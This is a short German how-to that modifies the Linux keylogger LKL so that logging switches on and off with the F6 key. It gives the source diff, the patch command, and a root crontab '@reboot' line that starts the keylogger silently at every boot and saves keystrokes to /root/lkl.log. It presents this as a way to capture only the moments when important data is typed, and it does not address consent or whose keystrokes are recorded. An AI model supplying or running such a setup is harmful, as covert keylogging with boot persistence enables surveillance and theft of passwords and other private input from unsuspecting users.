Ein Keylogger ist ja eine gute Sache, aber was wenn man nur zu bestimmten Zeitpunkten loggen will? Z.B. wenn man gerade dabei ist wichtige Daten einzugeben?
Kein Problem, mann nehme LKL.sf.net und entpacke ihn. Jetzt muss folgendes in einer Datei gespeichert werden:
40a41
> static int dolog=0;
42a44,54
> if(strcmp(ascii,”F6″) == 0){
> if(dolog==1){ dolog = 0; }
> else{
> if(dolog==0){ dolog=1; }
> else{ dolog=1; }
> }
> return;
> }
>
>
> if(dolog==1){
58c70
<
—
> }
Jetzt muss dieser Patch ganz einfach mit “patch output.c name_der_datei” im lkl-Verzeichnis angewendet werden. Ganz normal kompilieren und starten. Der Keylogger beginnt aber erst das loggen, wenn F6 gedrückt wird. Wenn wieder F6 gedrückt wird, hört er wieder auf. Jetzt mit “sudo crontab -e” die Crontab editieren und folgende Zeile hinzufuegen:
@reboot /Pfad/zu/lkl -l -k /Pfad/zu/lkl/Verzeichnis/keymaps/us_km -o /root/lkl.log
In /root/lkl.log werden die Logs gespeichert. Man kann natürlich auch einen anderen Speicherplatz wählen, allerdings sollte dieser immer nur von root lesbar sein, weil es sonst ein (wenn auch geringes) Sicherheitsrisiko gäbe.